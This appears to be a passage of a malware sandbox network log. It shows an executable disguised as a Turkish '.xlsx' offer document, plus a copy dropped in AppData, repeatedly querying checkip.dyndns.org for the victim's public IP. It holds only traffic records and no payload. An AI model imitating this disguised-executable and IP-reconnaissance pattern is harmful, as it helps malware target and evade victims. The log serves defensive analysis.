                                                                      Oct 7, 2024 14:52:21.143676996 CEST151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 14:52:21.797427893 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:21 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: c11e5fea23f0fc17a0b1055c6fc47b42
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                      Oct 7, 2024 14:52:21.803406000 CEST127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Oct 7, 2024 14:52:22.005261898 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:21 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: 92168b7957e00e544b450598e12fd823
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                      Oct 7, 2024 14:52:22.971702099 CEST127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Oct 7, 2024 14:52:23.182259083 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:23 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: b9cc70c7d014a34493da2748049a9db5
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.749744132.226.247.73807944C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 14:52:23.802640915 CEST127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Oct 7, 2024 14:52:24.447212934 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:24 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: 3bd99f1689ea1b8cc3b9ae84836b2c21
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.749754132.226.247.73807944C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 14:52:25.043914080 CEST151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 14:52:25.713902950 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:25 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: f4a1a7733db9ba46d693d924420e73f2
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.749758132.226.247.73806504C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 14:52:25.231070042 CEST151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 14:52:25.909573078 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:25 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: e0f4947810adb4674d8f5816180cbd53
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                      Oct 7, 2024 14:52:25.913847923 CEST127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Oct 7, 2024 14:52:26.117898941 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:26 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: 3aa7e9558e4d122922cae6bc44ca6ff3
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                      Oct 7, 2024 14:52:26.328260899 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:26 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: 3aa7e9558e4d122922cae6bc44ca6ff3
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                      Oct 7, 2024 14:52:26.806149006 CEST127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Oct 7, 2024 14:52:27.010426998 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:26 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: b94cd715d5d8b033057d6981f8b0d3c6
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.749769132.226.247.73807944C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 14:52:26.337510109 CEST151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 14:52:26.990237951 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:26 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: e07ec2da2a1489b1bdb24afd9da7cf78
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.749782132.226.247.73807944C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 14:52:27.637656927 CEST151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 14:52:28.292773008 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:28 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: 04b0ae93d30d39c0ab39a916349b4029
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.749783132.226.247.73806504C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 14:52:27.639215946 CEST127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Oct 7, 2024 14:52:28.383421898 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:28 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: 8c3eb07f733585ea04f7081a76297ba9
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.749791132.226.247.73807944C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 14:52:28.917120934 CEST151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 14:52:29.610243082 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:29 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: fbada9c24651374e266482d9b46fe0b7
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.749796132.226.247.73806504C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 14:52:29.047697067 CEST127OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Oct 7, 2024 14:52:29.719218016 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:29 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: c761540c63d63342735080482afc05b2
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.749805132.226.247.73807944C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 14:52:30.238791943 CEST151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 14:52:30.883985996 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:30 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: ed6e0eeb06942241e7821b9716806046
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.749806132.226.247.73806504C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 14:52:30.359100103 CEST151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 14:52:31.007693052 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:30 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: c703abb0b96ec1cf4e2c60d51caff330
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.749818132.226.247.73807944C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 14:52:31.547729969 CEST151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 14:52:32.190016985 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:32 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: 689cd78fcd9b4499e6a48d3183a6cd0d
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.749819132.226.247.73806504C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 14:52:31.677540064 CEST151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 14:52:32.351125956 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:32 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: bc30a4fddd91434598fe782c1a2b3175
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.749834132.226.247.73806504C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 14:52:33.509063959 CEST151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 14:52:34.161607981 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:34 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: 2c4064d85820eb46adce0a5b6cac6ba5
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.749844132.226.247.73806504C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 14:52:34.786511898 CEST151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 14:52:35.449213982 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:35 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: 42eb3df13fc4574b9caff36028587706
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      15192.168.2.749862132.226.247.73806504C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 7, 2024 14:52:36.561764956 CEST151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 14:52:37.248243093 CEST320INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:37 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 103
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      X-Request-ID: f1f5401d8d7c7e29ffd4317b48ca35cb
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
